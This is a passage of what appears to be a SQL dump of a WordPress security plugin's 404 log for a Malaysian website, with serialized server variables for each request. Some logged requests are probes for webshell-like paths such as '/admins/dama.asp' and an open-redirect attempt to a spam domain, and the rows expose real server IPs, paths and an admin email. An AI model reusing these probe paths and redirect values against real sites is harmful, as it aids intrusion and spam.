JuziBrowser\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"45.252.189.121\";s:11:\"REMOTE_PORT\";s:5:\"36509\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa1Zz@B6WkHPNakGAMJ0SwAAAEU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571641808.0472\";s:12:\"REQUEST_TIME\";s:10:\"1571641808\";}}','notice','2019-10-21 07:10:10','2019-10-21 07:10:08',35313280,37116184,'https://bintara.com.my/?page_id=18',1,0,'45.252.189.121'),(28572,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"851B89C2-4AE1-4C60-8A9D-79DD64F15E5C\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa12XKAwEvHJaKWJ1hYSIwAAABM\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"210.186.113.64\";s:11:\"REMOTE_PORT\";s:5:\"55122\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa12XKAwEvHJaKWJ1hYSIwAAABM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571649116.2491\";s:12:\"REQUEST_TIME\";s:10:\"1571649116\";}}','notice','2019-10-21 09:11:59','2019-10-21 09:11:56',35276520,37085832,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'210.186.113.64'),(28573,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:46:\"/wordpress/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/wordpress/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/wordpress/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa13D6jZzpoQqaKQA3IYUQAAANU\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/wordpress/\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/wordpress/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa13D6jZzpoQqaKQA3IYUQAAANU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.72.67\";s:11:\"REMOTE_PORT\";s:5:\"52980\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/wordpress/\";s:10:\"SCRIPT_URL\";s:11:\"/wordpress/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa13D6jZzpoQqaKQA3IYUQAAANU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571649295.7675\";s:12:\"REQUEST_TIME\";s:10:\"1571649295\";}}','notice','2019-10-21 09:14:58','2019-10-21 09:14:56',34972056,36769104,'https://bintara.com.my/wordpress/?initiationactivity=initiationready',1,0,'37.187.72.67'),(28574,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/wordpress/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/wordpress/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/wordpress/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa13YuB6WkHPNakGAMKTXAAAAEQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/wordpress/\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/wordpress/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa13YuB6WkHPNakGAMKTXAAAAEQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.72.67\";s:11:\"REMOTE_PORT\";s:5:\"60416\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/wordpress/\";s:10:\"SCRIPT_URL\";s:11:\"/wordpress/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa13YuB6WkHPNakGAMKTXAAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571649378.4489\";s:12:\"REQUEST_TIME\";s:10:\"1571649378\";}}','notice','2019-10-21 09:16:20','2019-10-21 09:16:18',34968040,36773952,'https://bintara.com.my/wordpress/?key=testActivation',1,0,'37.187.72.67'),(28575,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:111:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:109:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"73.21.0.164\";s:11:\"REMOTE_PORT\";s:5:\"49268\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa19Bm1ncq3cUuJao9L@0gAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571650822.2641\";s:12:\"REQUEST_TIME\";s:10:\"1571650822\";}}','notice','2019-10-21 09:40:24','2019-10-21 09:40:22',34923864,36729152,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'73.21.0.164'),(28576,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admins/dama.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"58.82.251.236\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"58.82.251.236\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admins/dama.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admins/dama.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2T@W1ncq3cUuJao9Ib1gAAAIQ\";s:12:\"REDIRECT_URL\";s:16:\"/admins/dama.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63673\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admins/dama.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admins/dama.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2T@W1ncq3cUuJao9Ib1gAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571656700.5201\";s:12:\"REQUEST_TIME\";s:10:\"1571656700\";}}','notice','2019-10-21 11:18:26','2019-10-21 11:18:21',35741912,37529400,'http://bintara.com.my//admins/dama.asp',1,0,'58.82.251.236'),(28577,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admins/dama.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.167.150.82\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.167.150.82\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admins/dama.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admins/dama.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2T-21ncq3cUuJao9Ib4QAAAI4\";s:12:\"REDIRECT_URL\";s:16:\"/admins/dama.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63900\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admins/dama.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admins/dama.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2T-21ncq3cUuJao9Ib4QAAAI4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571656704.8724\";s:12:\"REQUEST_TIME\";s:10:\"1571656704\";}}','notice','2019-10-21 11:18:29','2019-10-21 11:18:25',35670432,37473976,'http://bintara.com.my//admins/dama.asp',1,0,'211.167.150.82'),(28583,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//contact/index.php\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"211.90.66.103\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"211.90.66.103\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/contact/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/contact/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2UbG1ncq3cUuJao9IckwAAAJM\";s:12:\"REDIRECT_URL\";s:18:\"/contact/index.php\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"61028\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/contact/index.php\";s:10:\"SCRIPT_URL\";s:18:\"/contact/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2UbG1ncq3cUuJao9IckwAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571656816.8255\";s:12:\"REQUEST_TIME\";s:10:\"1571656816\";}}','notice','2019-10-21 11:20:30','2019-10-21 11:20:20',35269752,37075024,'http://bintara.com.my//contact/index.php',1,0,'211.90.66.103'),(28584,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//include/left.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"219.234.31.15\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"219.234.31.15\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/include/left.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/include/left.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2UeKAwEvHJaKWJ1hYiEwAAAAw\";s:12:\"REDIRECT_URL\";s:18:\"/include/left.ashx\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.211\";s:11:\"REMOTE_PORT\";s:5:\"61319\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/include/left.ashx\";s:10:\"SCRIPT_URL\";s:18:\"/include/left.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2UeKAwEvHJaKWJ1hYiEwAAAAw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571656825.9808\";s:12:\"REQUEST_TIME\";s:10:\"1571656825\";}}','notice','2019-10-21 11:20:33','2019-10-21 11:20:30',35268008,37072760,'http://bintara.com.my//include/left.ashx',1,0,'219.234.31.15'),(28585,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//include/left.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 